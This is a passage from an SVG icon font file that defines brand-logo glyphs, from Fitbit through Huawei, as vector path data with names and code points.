1 0 2 0 2z m-1-40c-2 0 0 2 0 2s5 2 8 4c5 2 15 13 12 8-1-3-4-6-4-6s-4-6-5-6c-4-3-9-1-11-2z m26-58c-8-15-20-25-20-25-4-4-1 2-1 2s11 15 16 26c4 8 6 18 8 20 4 5 2-15-3-23z m10 55s-1-4-3-5c-3-1-14-1-14 0-1 1 12 2 17 7 1 1 0-2 0-2z" />
<glyph glyph-name="brand-fitbit" horiz-adv-x="1000" unicode="&#xe8d5;" d="M500-1c-18 0-37-8-51-21-13-13-21-32-21-51 0-18 8-37 21-51 13-13 31-21 51-21 19 0 37 8 51 21 14 14 22 32 22 51 0 19-8 37-22 51-14 13-32 21-51 21z m0 424c-18 0-37-8-51-22-13-13-21-32-21-51 0-18 8-37 21-51 13-13 31-20 51-21 19 0 37 8 51 21 14 14 22 32 22 51 0 19-8 37-22 51-14 14-32 22-51 22z m0 422c-18 0-37-7-51-20-13-14-21-32-21-51 0-19 8-37 21-51 13-12 31-20 51-21 19 0 37 8 51 21 14 13 22 32 22 51 0 18-8 37-22 51-14 12-32 20-51 20z m3-211c-19 1-38-6-51-19-14-12-22-30-23-49 0-20 7-38 19-52 12-13 30-22 50-23 19 0 38 7 51 19 15 13 23 31 24 50 0 19-7 38-20 51-13 14-31 22-50 23z m-3-423c-18 0-37-8-51-21-13-14-21-32-21-51s8-37 21-51c13-13 31-21 51-21 19 0 37 8 51 21 14 14 22 32 22 51 0 18-8 37-22 51-14 14-32 21-51 21z m212 212c-19 0-37-8-51-22-14-13-22-32-22-51 0-18 8-37 22-51 13-13 32-20 51-21 18 0 36 8 50 21 14 14 22 32 22 51 0 19-8 37-22 51-14 14-32 22-50 22z m0 211c-19 0-37-7-51-21-14-13-22-32-22-50 0-19 8-37 22-51 13-14 32-22 51-22 18 0 36 8 50 22 14 13 22 32 22 51 0 18-8 36-22 50-14 13-32 21-50 21z m0-423c-19 0-37-8-51-21-14-14-22-32-22-51s8-37 22-51c13-13 32-21 51-21 18 0 36 8 50 21 14 14 22 32 22 51 0 18-8 37-22 51-14 14-32 21-50 21z m211 212c-18 0-37-8-51-22-13-13-21-32-21-51 0-18 8-37 21-51 13-13 31-20 51-21 19 0 37 8 51 21 13 14 21 32 21 51 0 19-7 37-21 51-13 14-32 22-51 22z m-635 0c-18 0-37-8-51-22-13-13-21-32-21-51 0-18 8-37 21-51 14-13 32-20 51-21 18 0 37 8 51 21 13 14 21 32 21 51 0 19-8 37-21 51-14 14-33 22-51 22z m0 211c-18 0-37-7-51-21-13-13-21-32-21-50 0-19 8-37 21-51 14-14 32-22 51-22 18 0 37 8 51 22 13 13 21 32 21 51 0 18-8 36-21 50-14 13-33 21-51 21z m0-423c-18 0-37-8-51-21-12-14-20-32-20-51s7-37 20-51c14-13 32-21 51-21 18 0 37 8 51 21 13 14 21 32 21 51 0 18-8 37-21 51-14 14-33 21-51 21z m-211 212c-18 0-37-8-51-22-13-13-21-32-21-50 0-19 8-37 21-51 13-13 31-20 51-21 19 0 37 8 51 21 14 13 22 32 22 51 0 18-8 37-22 51-14 13-32 21-51 21z" />
<glyph glyph-name="brand-flikr" horiz-adv-x="1000" unicode="&#xe8d6;" d="M444 350c0-122-100-222-222-222s-222 100-222 222 99 222 222 222 222-99 222-222z m556 0c0-122-99-222-222-222s-222 100-222 222 100 222 222 222 222-99 222-222z" />
<glyph glyph-name="brand-forbes" horiz-adv-x="1000" unicode="&#xe8d7;" d="M92 458l27 0 26 0 6-2c15-5 25-16 34-34 2-4 4-10 5-13 1-3 2-6 2-6 0 0 3 0 6 1l5 2-1 23c0 13 0 28-1 34l0 11h-201l0-4 0-4 7-1c9-1 12-2 15-5 6-3 9-9 11-18 3-14 4-45 4-103-1-61-2-74-6-86-3-10-9-16-19-17-2-1-6-2-8-2l-3-1v-8h128v4c0 3 0 4 0 4-4 0-20 4-22 5-10 5-14 16-15 39-2 17-3 66-2 66s31 0 35-1c10-3 17-12 21-27l2-7 4 0 4 0v83h-4c-5 0-5 0-5-1 0-3-3-12-5-17-4-9-10-14-17-15-2-1-10-2-19-2-12 0-16 0-16 0-1 1 1 96 2 101l0 1z m234-71c-15 14-34 21-58 21-26 0-47-8-63-24-17-18-26-42-26-70 0-29 8-53 24-70 9-9 17-14 30-19 4-1 7-2 19-4 1 0 7 0 15 0 9 0 14 0 19 2 12 3 23 7 32 14 22 16 34 42 35 74 1 32-8 59-27 76z m-37-139c-4-7-10-13-15-14-20-6-34 13-39 52-2 13-2 47 0 62 3 32 13 48 29 48 7 0 10-2 16-7 13-13 19-38 19-77 0-32-3-51-10-64z m707 54c-6 13-17 20-42 31-19 8-30 15-35 21-4 5-5 9-5 16 0 10 4 17 11 22 7 4 14 5 23 3 11-2 19-9 26-21 2-4 7-15 10-22 0-1 0-1 3 0 1 0 3 1 3 1v23l0 23-3 1c-4 2-16 5-23 6-6 1-11 1-24 1-16 0-18 0-24-1-20-6-34-17-41-32-4-8-5-14-5-23 0-14 3-24 12-33 6-8 16-13 32-19 12-5 25-11 30-15 3-2 5-5 6-8 3-4 3-5 3-12 0-6 0-7-3-12-5-11-15-17-30-16-19 2-33 15-45 42-2 7-2 7-7 5l-2 0 1-26c0-22 0-25 1-26 3-3 24-8 38-9 12-2 28-2 37 0 31 4 51 21 56 46 2 12 1 25-3 34z m-188 101c-8 4-16 5-26 5-25 0-45-8-61-25-13-13-20-27-25-48-1-6-1-9-1-22s0-16 1-22c8-38 34-63 70-69 8-2 22-2 31 0 16 2 33 10 44 22 7 6 9 9 8 10-2 4-2 4-8 1-10-6-15-8-26-9-13-2-26 1-37 7-8 3-18 12-22 20-6 11-9 24-10 41-1 7-1 8 0 9 1 0 25 0 54 0h53v3c0 5-1 17-3 24-6 27-20 46-42 53z m-9-65l-12 0c-7-1-18-1-26-1l-13 0v3c0 1 1 6 1 9 5 29 15 47 29 47 12 0 19-18 21-49v-9z m-300 68c-5 2-10 3-16 2 0 0-1 0-2 0-18-1-34-13-45-33-2-4-4-7-5-7 0 0 0 4 0 20l0 20-1 0c-1-1-16-4-32-7-36-7-41-8-42-9 0 0 0-1 0-3 0-2-1-2 7-3 12-2 16-8 17-23 2-21 2-102-1-113-1-6-5-11-8-13-1-1-5-2-9-3l-6-1 0-4 0-4h105v8l-5 1c-13 1-16 2-20 7-4 7-5 20-5 73v41l1 2c3 2 9 6 14 7 10 2 23 0 33-5 3-1 6-2 6-2 0 0 17 44 17 46 1 1 0 1-3 3z m168-38c-10 19-26 32-45 36-14 3-33 1-46-5-4-2-7-3-8-3-1 0-1 5-1 42l1 42-3-1c-2 0-18-3-36-7s-34-6-35-6c-1 0-1-1-1-3 0-3 0-3 3-4 9-2 11-2 14-6 4-4 6-10 7-21 1-9 1-167 0-190l0-14 7-1c28-6 57-8 74-6 22 4 38 11 52 24 19 20 28 47 28 80-1 18-4 29-11 43z m-45-72c-3-25-11-45-22-55-4-4-8-6-14-7-3-1-5-1-11 0-3 0-4 0-5 2-1 2-2 87-1 121l0 26 5 1c3 1 7 2 11 2 6 0 7 0 12-3 12-6 21-21 25-44 1-9 2-32 0-43z" />
<glyph glyph-name="brand-foursquare" horiz-adv-x="1000" unicode="&#xe8d8;" d="M257 722c-6-15-5-31-5-47 1-209-1-419 1-628 56 65 110 131 164 198 13 14 26 34 49 34 53 4 107-2 161 2 12 0 23 7 26 19 11 37 17 75 24 112 3 16 3 41-18 41-64 6-129-3-192 4-34 6-36 47-32 74 2 22 23 34 43 33 65 2 130-1 195 1 13 1 30 0 37 15 10 24 12 52 18 78 4 22 11 44 7 66-10 17-32 14-49 16-128-1-255-1-383 0-16-1-38-1-46-18z m-48 125c10 2 20 3 30 3 175 0 349-1 524 0 29 0 64-2 82-29 22-34 11-78 4-115-31-149-58-299-89-448-6-24-12-50-30-68-13-13-32-18-51-19-54-3-108 2-162-1-14 1-24-10-32-19-75-89-153-175-228-264-10-11-21-24-34-31-23-12-55-6-70 15-10 13-11 30-11 46 0 257 0 514 0 771 0 31-3 64 3 95 5 32 32 59 64 64z" />
<glyph glyph-name="brand-foxconn" horiz-adv-x="1000" unicode="&#xe8d9;" d="M0 356v-64h46l-1 43h72v23h-74v21h80v30h-83c-41-5-40-53-40-53z m276 16c-2 28-37 36-37 36h-67c-31-3-39-32-39-32v-47c4-31 33-37 33-37h78c30 10 32 33 32 33v47z m-41-50h-61l1 56h60v-56z m426 86h-67c-31-3-39-32-39-32v-47c4-31 34-37 34-37h77c30 10 33 33 33 33v47c-3 28-38 36-38 36z m-4-86h-61l1 56h60v-56z m-232 86h-50l-24-24-25 25h-52l47-59-47-58 53 0 23 24 25-25 52 3-47 57 45 57z m0-36c-1-7-3-26 2-48l0-1c6-21 39-31 39-31h80v31h-80v52h81v34h-80c-36-4-42-37-42-37z m390 37h-106v-118h43v85h55l1-84 43 1v79c-3 28-36 37-36 37z m149 0h-106v-118h43v85h55l1-84 43 1v79c-2 28-36 37-36 37z" />
<glyph glyph-name="brand-fujitsu" horiz-adv-x="1000" unicode="&#xe8da;" d="M531 529c0 33-27 62-62 62-20 0-38-12-49-27v-33c15 44 49 41 49 41 25 0 44-20 44-43 0-26-19-46-44-46-12 0-23 6-31 14l-21 24c-9 9-22 15-36 15-28 0-50-23-50-51 0-27 23-50 50-50 16 0 30 7 39 19v25c-15-30-39-25-39-25-18 0-32 14-32 31 0 18 14 32 32 32 9 0 17-3 23-10l21-24c12-10 27-17 44-17 35 0 62 27 62 63z m-28-109h-73c10 0 18-11 18-21v-181c0-10-8-21-18-21h73c-10 0-17 11-17 21v181c0 10 7 21 17 21z m-136-21v-226s-1-41-33-64c0 0 71 10 71 77l0 213c0 10 7 21 17 21h-73c10 0 18-11 18-21z m-99 21c10 0 18-11 18-21v-141c0-24-19-44-42-44-23 0-42 20-42 42v143c0 10 7 21 17 21h-73c10 0 18-11 18-21v-139c0-43 36-69 80-69 44 0 80 26 80 69v139c0 10 7 21 17 21h-73z m-250-21v-181c0-10-8-21-18-21h73c-10 0-17 11-17 21v88h51c9 0 19-8 19-17l0 39h-70v69h68c10 0 19-8 19-18v41h-143c10 0 18-11 18-21z m751-86l-45 24c-22 11-19 29-19 29s-2 36 43 36c0 0 28 1 40-19v34c-6 6-42 7-42 7-80 0-79-62-79-62s-5-34 41-59l45-26c20-11 17-25 17-25s0-37-51-38c0 0-41 3-54 24l13-42c15-6 41-5 41-5 90 0 88 64 88 64s5 34-38 58z m158 107c10 0 17-11 17-21v-141c0-24-18-44-41-44s-43 20-43 42v143c0 10 8 21 18 21h-73c10 0 17-11 17-21l0-139c0-43 36-69 81-69 44 0 79 26 79 69v139c0 10 8 21 18 21h-73z m-139-37z m-272 37l-12-41c10 18 25 18 25 18h39v-179c0-10-8-21-18-21h74c-10 0-18 11-18 21v179h32c10 0 18-8 18-18l12 41h-152z" />
<glyph glyph-name="brand-general-electric" horiz-adv-x="1000" unicode="&#xe8db;" d="M1000 350c0 276-224 500-500 500s-500-224-500-500c0-277 224-500 500-500s500 223 500 500z m-24 0c0-263-213-476-476-476s-476 213-476 476 213 477 476 477 476-215 476-477z m-30 0c0 158-81 322-254 374-36 11-66 18-101 18-80 0-83-45-120-45-21 0-35 15-35 33 0 31 38 56 97 56 56 0 99-14 107-18l1 4c-15 6-68 24-141 24-159 0-321-82-374-253-11-36-18-67-18-101 0-81 46-85 46-122 0-20-15-34-33-34-32 0-57 37-57 97 0 56 14 99 16 107l-4 1c-4-16-22-68-22-141 0-161 82-323 254-376 36-11 66-17 101-17 80 0 83 47 120 47 20 0 35-16 35-35 0-30-36-55-97-55-55 0-100 13-107 16l-1-4c15-7 68-22 141-22 160 0 323 80 374 254 11 34 18 66 18 99 0 82-46 85-46 122 0 21 14 35 34 35 32 0 57-38 57-99 0-54-14-97-17-106l4-2c5 17 22 68 22 143z m-168-133c0-62-54-127-133-127-95 0-144 80-144 152 0 101 70 144 99 159-6 5-10 10-14 17-34-23-64-44-128-80-2-45-6-93-18-127-23-70-72-121-136-121-53 0-80 38-80 80 0 30 18 69 50 98 40 36 85 58 146 91 1 8 2 16 4 26-15-14-38-20-56-20-29 0-52 25-58 52-39 3-68 30-69 74 0 32 12 60 33 60 9 0 11-7 11-13 0-5-7-23-7-41 0-18 9-42 31-42 0 72 53 165 115 165 41 0 47-30 47-44 0-65-65-137-118-155 1-6 7-21 24-21 21 0 45 20 58 35 5 29 26 70 54 70 11 0 16-8 16-18 0-21-22-47-38-65-3-14-4-29-4-41 48 29 73 44 109 70-3 10-3 21-3 32 0 65 43 137 100 137 32 0 48-22 48-47 0-47-40-88-97-131 5-11 11-21 22-27 2 3 20 6 35 6 17 0 40-4 40-21 0-19-26-24-47-24-11-1-29 3-29 3-30-8-89-43-89-131 0-60 38-115 96-115 44 0 80 33 82 84 0 33-14 68-47 68-17 0-32-12-32-30-1-28 19-31 19-49 0-12-9-18-19-18-28 0-49 28-49 62 0 42 36 76 83 76 61 1 93-52 93-109z m-102 349c0 7-1 16-10 16-21 0-54-45-54-102 42 36 64 67 64 86z m-245 6c0 7-4 10-10 10-29 0-70-77-70-122 45 25 80 81 80 112z m-17-259c-62-31-141-85-141-144 0-22 11-36 32-36 60 0 98 97 109 180z" />
<glyph glyph-name="brand-gillette" horiz-adv-x="1000" unicode="&#xe8dc;" d="M110 363l-12-51h41c-4-26-70-38-60 27 7 46 64 70 77 35l70 18c-10 44-49 65-92 65-58 0-124-41-133-122-8-68 43-105 102-104 42 1 76 16 92 28l24 104h-109z m128 23l-35-150h73l35 150h-73z m107 86l-56-236h73l56 236h-73z m-18-22h-74l-12-55 78 20 8 35z m600-54c-30 0-55-13-72-34 2 11 5 23 5 23h-30l15 65h-73l-15-65h-17l16 65h-73l-16-65-23 0-11-39c-8 34-41 50-71 50-44 0-77-28-91-67l34 143h-74l-55-236h73l16 67c-3-27 7-75 73-75 33 0 76 21 86 51l-58 10c-6-8-16-13-25-13-16 0-20 13-17 25l106 0c1 4 4 8 5 21 0 4 0 8-1 11h21l-23-98h73l23 98h16l-23-98h74l23 98h20l0 0c-4-9-6-18-8-28-3-26 5-78 73-78 33 0 76 22 86 52l-57 10c-7-8-16-13-26-13-15 0-20 13-17 25h107c1 4 3 8 4 21 3 51-36 74-73 74z m-354-65l-41 1c6 21 44 25 41-1z m365 0l-41 0c7 21 44 26 41 0z" />
<glyph glyph-name="brand-gizmodo" horiz-adv-x="1000" unicode="&#xe8dd;" d="M178 422c-4 0-8-2-10-4-3-3-4-8-4-13v-110c0-5 1-9 4-12 2-3 6-5 10-5 4 0 8 2 10 5 3 2 4 7 4 13v109c0 5-1 10-4 13s-6 4-10 4z m750 0c-39 0-71-32-71-72s32-72 71-72c40 0 72 33 72 72s-32 72-72 72z m0-115c-23 0-42 20-42 43 0 24 19 43 42 43s43-19 43-43c0-24-19-43-43-43z m-322 115c-39 0-71-32-71-72s32-72 71-72c40 0 72 33 72 72s-32 72-72 72z m0-115c-23 0-42 20-42 43 0 24 19 43 42 43 24 0 43-19 43-43s-19-43-43-43z m158 115l-2 0-36 0c-6 0-11-2-13-4-3-3-4-8-4-14v-108c0-6 1-11 4-13 2-3 7-5 13-5l36 0c1 0 1 0 2 0 23 1 43 12 56 30 9 12 14 26 14 42v0c0 16-5 31-14 42-13 18-33 29-56 30z m41-72c0-9-3-17-8-24-7-10-17-17-30-18-3-1-7-1-11-1h-19v86h19c4 0 8-1 11-1 12-1 23-8 30-18 5-7 8-15 8-24z m-311 71c-5 2-11 0-14-5l-43-66-43 66c-3 5-9 7-14 5-5-1-9-6-9-12v-117c0-7 6-13 12-13 7 0 13 6 13 13v75l30-47 1 0v0l0 0c0 0 0-1 0-1l1 0 0-1 1 0 0 0 1-1 0 0c0 0 1-1 1-1l0 0c0 0 0 0 1 0 1-1 2-1 4-1 0 0 0 0 0 0h1c0 0 1 0 1 0 1 0 3 0 4 1 0 0 0 0 1 0l0 0c0 0 0 1 1 1l0 0 1 1 0 0 1 0c0 1 0 1 0 1l0 0c1 1 1 1 1 1l0 0v0l0 1 31 46v-75c0-7 5-13 12-13 7 0 13 6 13 13v117c0 6-4 11-9 12z m-165-113h-66l74 86c4 5 5 15 1 19-5 5-10 6-15 6h-84c-7 0-13-5-13-12 0-7 6-13 13-13h62l-76-89c-4-5-4-11-2-16 2-5 8-8 13-8h93c7 0 12 6 12 14 0 7-5 13-12 13z m-212 54h-34c-8 0-14-7-14-14s6-14 14-14h20v-20c-6-4-16-8-31-8-27 0-41 23-41 43 0 34 24 46 41 46 19 0 33-10 34-10 6-4 14-2 18 4 4 6 3 15-3 19-1 0-21 14-49 14-28 0-72-20-72-73 0-17 7-35 19-48 13-15 32-23 52-23 26 0 46 11 55 20 3 2 4 6 4 9v41c0 7-6 14-13 14z" />
<glyph glyph-name="brand-gnome" horiz-adv-x="1000" unicode="&#xe8de;" d="M589 59c9-71-52-106-112-60-190 145 316 217 283 416-28 165-533 114-591-144-39-174 160-416 368-416 103 0 221 92 243 210 17 89-199 53-191-6z m229 786c-206 0-245-293-129-293 115 0 335 293 129 293z m-342-257c61-4 129 236 13 221-116-15-75-217-13-221z m-283-148c44 19 5 208-69 156-75-51 25-176 69-156z m123 98c53 11 56 225-37 187-94-39-15-197 37-187z" />
<glyph glyph-name="brand-google" horiz-adv-x="1000" unicode="&#xe8df;" d="M341 423c-45 0-82-34-82-81 0-47 37-82 82-82 45 0 82 35 82 82 0 47-37 81-82 81z m0-131c-25 0-46 21-46 50 0 29 21 49 46 49s46-20 46-49c0-29-22-50-46-50z m-213 106v-35h83c-2-19-9-33-19-43-12-12-31-25-64-25-50 0-90 41-90 92s40 92 90 92c28 0 48-11 63-25l24 24c-21 20-48 35-87 35-69 0-128-57-128-126s59-127 128-127c38 0 66 12 89 36 23 22 30 54 30 80 0 9-1 16-2 22h-117z m669 107h35v-240h-35z m134-213c-19 0-32 8-40 25l109 45-4 9c-6 18-27 52-69 52-42 0-77-33-77-81 0-46 34-82 81-82 37 0 59 23 68 36l-28 19c-10-14-22-23-40-23z m-3 100c14 0 26-8 30-18l-73-30c-1 31 25 48 43 48z m-190 13h-1c-8 9-24 18-43 18-41 0-78-36-78-82 0-45 37-81 78-81 19 0 35 9 43 19h1v-12c0-31-17-48-43-48-22 0-36 16-42 29l-31-13c9-22 33-48 73-48 41 0 77 25 77 85v146h-34v-13z m-41-113c-25 0-45 21-45 49 0 29 20 50 45 50 24 0 43-21 43-50 0-28-19-49-43-49z m-178 131c-45 0-82-34-82-81 0-47 37-82 82-82 45 0 82 35 82 82 0 47-37 81-82 81z m0-131c-25 0-46 21-46 50 0 29 21 49 46 49s46-20 46-49c0-29-21-50-46-50z" />
<glyph glyph-name="brand-gopro" horiz-adv-x="1000" unicode="&#xe8e0;" d="M202 352c-5 0-8 0-11-1h-53c-6 0-11-5-11-11s5-11 11-11h44v-15c0-4-5-7-14-10-8-2-15-3-22-3h-72c-28 0-42 5-42 14v69c0 10 17 15 51 15 1 0 2 0 4-1 1 0 3 0 6 0 0 0 0 0 1 0h9c7 0 11 4 11 11s-4 10-11 10h-29c-17 0-33-2-47-7-18-6-27-15-27-27v-70c0-13 9-23 27-28 12-5 28-7 47-7h72c17 0 32 2 44 7 16 6 24 16 24 28v28c0 6-4 9-12 9z m162 38h-50c-18 0-33-2-45-7-17-7-25-16-25-28v-40c0-13 8-22 25-28 13-4 28-7 45-7h50c18 0 32 3 43 7 15 6 23 15 23 28v40c0 23-22 35-66 35z m36-75c0-5-5-9-15-12-7-1-14-2-22-2h-49c-9 0-17 0-24 2-11 2-16 6-16 12v40c0 5 5 9 15 12 8 2 16 3 25 3h49c25 0 37-5 37-13v-42z m382 75c-22 0-39-1-50-5-18-5-27-14-27-29v-66c0-7 3-10 10-10s12 1 13 1c5 1 7 4 7 9v66c0 9 11 14 34 14h6c2 0 4 0 5 0 9 0 13 3 13 9 0 7-3 11-11 11z m152 0h-51c-17 0-32-2-44-7-17-7-25-16-25-28v-40c0-13 8-22 25-28 13-4 28-7 45-7h50c18 0 32 3 43 7 15 6 23 15 23 28v40c0 23-22 35-66 35z m36-75c0-5-5-9-15-12-7-1-14-2-22-2h-49c-9 0-17 0-24 2-11 2-16 6-16 12v40c0 5 5 9 15 12 8 2 16 3 25 3h49c25 0 37-5 37-13v-42z m-292 74c0 11-9 20-28 25-12 4-28 6-45 6h-132c-8 0-12-3-12-9v-121c0-6 4-9 12-9 7 0 12 0 13 1 5 1 7 4 7 8v41h110c19 0 35 2 49 6 17 7 26 17 26 30v22z m-32-21c0-11-14-17-41-17h-112v49h112c27 0 41-5 41-13v-19z" />
<glyph glyph-name="brand-gucci" horiz-adv-x="1000" unicode="&#xe8e1;" d="M653 9c-48-2-94 9-139 27-10 3-24 1-34-3-129-50-284-26-383 81-93 99-120 217-77 345 43 128 137 204 270 228 67 12 132 5 194-23 15-6 27-1 41 4 131 46 253 29 360-64 171-148 148-422-45-543-57-35-118-54-187-52z m-80 80c114-37 244 9 311 110 68 101 61 234-17 326-79 93-203 117-292 85 50-47 88-101 106-169-20 0-37 1-54 0-13-1-19 3-24 15-20 44-49 82-88 112-11 8-18 9-28 0-40-31-69-69-90-114-3-6-10-13-16-13-19-2-39-1-60-1 17 70 56 124 107 171-108 39-243-9-311-109-68-102-59-239 20-330 77-89 206-116 287-82-80 93-116 166-112 231h161v-67h-75c7-39 66-117 98-128 4-2 12 1 17 5 38 29 68 65 88 109 2 4 2 9 4 16h-77v64h165c-11-92-50-168-120-231z" />
<glyph glyph-name="brand-hallmark" horiz-adv-x="1000" unicode="&#xe8e2;" d="M908 439c-156-315-183-83-161-4 14 46-12 57-28 7-19-47-58-140-104-134-76 11-101 151-104 306 0 35-30 33-30 0-3-60-15-289-104-304-63-11-97 103-102 130-14 49-42 40-29-9 8-46 17-138-19-154-56-24-131 128-148 163-16 36-39 23-25-12l139-335c150 67 439 77 587 2l154 332c14 30-7 44-26 12z m-416-337c-161 0-292-35-292-78 0-44 131-79 292-79s292 35 292 79c0 43-131 78-292 78z m0-121c-134 0-242 19-242 43 0 24 108 43 242 43s242-19 242-43c0-24-109-43-242-43z m42 735c0-21-17-38-38-38s-37 17-37 38 16 38 37 38 38-17 38-38z m263-171c0-21-16-37-37-37s-38 16-38 37 17 38 38 38 37-17 37-38z m203-14c0-21-17-38-38-38s-38 17-38 38 17 38 38 38 38-17 38-38z m-722 14c0-21-17-37-38-37s-37 16-37 37 16 38 37 38 38-17 38-38z m-202-14c0-21-17-38-38-38s-38 17-38 38c0 21 17 38 38 38s38-17 38-38z" />
<glyph glyph-name="brand-hi5" horiz-adv-x="1000" unicode="&#xe8e3;" d="M965 410l9 176h-336l-50-273 1 0c-4-8-7-18-9-27v-44h33v-64c34-37 92-64 172-64 127 0 215 80 215 194 0 36-12 73-35 102z m-176-252c-103 0-165 52-165 104 0 35 24 67 66 67 30 0 45-20 45-43 0-12-5-17-5-27 0-14 6-23 29-23 33 0 49 34 49 68 0 31-12 53-38 53-19 0-28-7-32-19l-96 12 36 192h254l-5-96h-169l-9-51c11 17 45 31 90 31 80 0 121-61 121-118 0-83-60-150-171-150z m-166 128v273h-184v-84h-62v-163h34v-26h-34v-163h279v163h-33z m-141 230h98v-65h-98v65z m131-349h-192v75h33v114h-33v75h159v-189h33v-75z m-192 0v75h33v44h-34v64c0 74-51 130-120 130-20 0-38-4-54-10v116h-246v-163h33v-137h-33v-162h454v43l-33 0z m-11 0h-173v75h14v74c0 23-1 44-14 44-13 0-26-16-35-50v-68h15v-75h-173v75h32v225h-32v75h158v-168c17 32 52 63 98 63 44 0 77-38 77-87v-108h33v-75z" />
<glyph glyph-name="brand-honda" horiz-adv-x="1000" unicode="&#xe8e4;" d="M506-57c-71 2-135 4-199 7-47 2-94 8-140 21-62 17-103 56-123 118-12 37-19 74-25 112-14 97-21 195-18 293 0 37 1 73 10 109 17 67 60 107 125 126 35 10 71 15 107 18 106 10 212 12 319 10 75-1 150-4 225-13 31-4 62-9 91-20 63-22 100-66 113-131 8-40 8-80 9-121 1-87-5-173-17-259-6-42-14-83-26-122-22-67-67-108-134-123-35-7-71-14-107-16-72-5-145-7-210-9z m0 34c61 2 128 4 195 9 33 2 66 7 98 14 52 12 89 43 107 94 8 26 16 53 21 80 16 91 23 183 22 276 0 46-1 92-10 137-11 56-44 93-99 110-20 6-41 10-61 13-75 11-150 14-225 15-97 2-194 0-291-10-31-3-61-8-92-15-61-15-100-53-110-116-6-36-8-73-10-109-3-84 3-167 14-249 5-40 12-80 24-119 19-59 58-96 119-108 37-7 75-13 113-15 59-4 119-5 185-7z m-260 33c-15 226-31 449-46 674 17 1 32 3 48 4 22 1 22 1 27-21 22-97 45-195 69-292 5-21 13-42 22-61 17-37 47-57 86-60 31-2 62-2 93 0 46 3 79 28 94 71 13 38 24 77 34 116 19 80 37 160 55 241 1 5 3 7 9 7 18-2 36-3 54-4 3-1 5-1 9-2-15-224-30-447-46-671-9-1-16-3-23-3l-71-4c-5 0-8 1-9 7-10 37-21 74-31 110-3 10-7 19-11 28-11 24-29 37-56 41-37 5-74 5-110-1-24-4-42-16-50-38-11-30-21-61-31-91-5-17-8-34-13-50-1-3-4-6-6-6-31 2-63 3-97 5z" />
<glyph glyph-name="brand-hp" horiz-adv-x="1000" unicode="&#xe8e5;" d="M500 850h-2c-35-101-72-201-108-302 26-1 52 0 78-1 19-1 39-8 49-25 12-19 12-43 4-63-35-99-71-198-106-297-31 0-62 0-93 0-4 0-9 0-13 1 40 109 78 218 117 327l-56 0c-3-6-4-12-7-18-35-101-71-201-107-302-2-2-1-8-5-8-30 0-60 0-89 0-5 0-11-1-16 1l241 674c-222-51-387-250-387-487 0-233 159-429 375-484 80 225 161 451 241 677 1 1 2 5 3 6 50 0 100 0 149 0 17 0 33 2 49-3 18-5 35-18 41-37 4-14 1-30-4-44-32-93-65-185-98-277-8-24-33-39-57-40l-116 0c-36-99-71-198-106-297 7-1 15-1 23-1 276 0 500 224 500 500 0 276-224 500-500 500z m158-645c33 96 68 191 102 286-15 0-29 0-43 0-4 0-10 2-13-2-34-95-68-190-102-284 19 0 38-1 56 0z" />
<glyph glyph-name="brand-hsbc" horiz-adv-x="1000" unicode="&#xe8e6;" d="M250 600l-250-250 250-250v500z m0 0l250-250-250-250h500l-250 250 250 250h-500v0z m500 0v-500l250 250-250 250z" />
<glyph glyph-name="brand-htc" horiz-adv-x="1000" unicode="&#xe8e7;" d="M658 394c-1-42-2-75-3-109-2-29-4-59-6-88-1-23-3-46-5-68-2-25-5-49-7-74-2-18-4-36-7-55-3-25-11-50-28-70-11-13-25-21-40-27-26-10-52-15-80-15-39 0-77-2-115-1-27 0-54 4-80 12-28 9-48 25-61 52-11 24-19 50-24 76-5 31-8 62-7 94 0 2 1 4 3 6 45 51 91 101 137 152 9 11 19 21 26 33 14 23 14 45 3 69-6 12-15 21-24 31-35 40-70 80-105 121-14 16-28 32-42 48-2 3-3 6-3 9 0 13-1 26 0 40 1 18 2 35 5 53 2 20 7 40 15 60 10 25 28 42 53 52 15 6 30 9 45 10 13 1 27 3 40 4 19 2 38 3 57 4 31 1 61-2 92-5 10-1 19-1 29-2 23-2 45-7 65-21 15-10 24-25 32-41 11-24 18-49 20-75 3-26 6-53 8-79 1-26 3-51 4-77 2-42 3-85 3-119z m81-46c1 61 7 113 22 163 2 7 4 15 7 21 9 22 27 30 49 25 11-3 19-8 27-16 23-22 46-43 68-65 26-26 50-52 71-82 6-9 11-18 15-27 5-14 0-27-4-40-6-16-16-29-27-41-26-28-51-57-78-84-21-22-43-42-67-59-1 0-1-1-2-1-14-11-25-10-39 2-12 10-18 23-22 38-8 36-15 73-17 110-2 22-2 43-3 56z m-739 0c1 61 7 113 22 163 2 7 4 15 7 21 9 22 27 30 49 25 11-3 20-8 28-16 22-22 45-43 67-65 26-26 50-52 71-82 6-9 11-18 15-27 5-14 1-27-4-40-6-16-15-29-27-41-26-28-51-57-78-84-21-22-43-42-67-59-1 0-1-1-2-1-14-11-25-10-39 2-12 10-18 23-21 38-9 36-16 73-18 110-2 22-2 43-3 56z" />
<glyph glyph-name="brand-huawei" horiz-adv-x="1000" unicode="&#xe8e8;" d="M569 145s-2-2 0-4c0 0 2-1 4 0 44 21 225 114 301 187 0 0 47 38 50 100 4 85-80 164-80 164s-159-191-276-447h1z m-451-28c29-13 58-14 58-14 5-1 181 0 228 0 2 0 3 3 3 3 2 2-1 4-1 4-133 90-392 229-392 229-24-73 8-132 8-132 33-69 96-90 96-90z m8 211c76-73 258-167 301-188 0 0 3 0 4 1 0 0 2 1 1 4-116 254-275 447-275 447s-87-83-81-165c4-62 50-99 50-99z m400-159c0-3 3-3 3-3 2-1 4 2 4 2 29 42 160 237 187 356 0 0 15 58 0 97 0 0-19 73-100 93 0 0-23 6-48 9 0 0-90-116-47-554h1z m-60-1s2-3 4-2c0 0 3 0 3 3h1c43 438-47 554-47 554-24-3-48-9-48-9-81-20-99-93-99-93-15-39 0-97 0-97 26-119 157-314 186-356z m-67-87l-304-10c33-59 88-105 146-91 40 10 131 73 160 95 3 2 2 4 2 4-1 2-4 2-4 2z m590 160c3 9 4 18 5 27 0 9 2 19 0 29 0 6-1 13-2 20-2 7-3 17-7 22h0c-19-10-38-20-56-31-24-13-48-26-71-39-40-22-80-45-119-69-15-7-29-17-43-25-8-6-35-22-41-25-10-8-22-13-31-20-11-5-20-14-30-19-5-6 2-8 7-7h236c40 6 78 23 106 53 11 11 21 25 29 39 8 14 14 29 17 45z m-84-171l-305 11s-2 0-3-2c0 0 0-4 1-4 29-22 118-83 160-95 0 0 79-27 147 90z" />
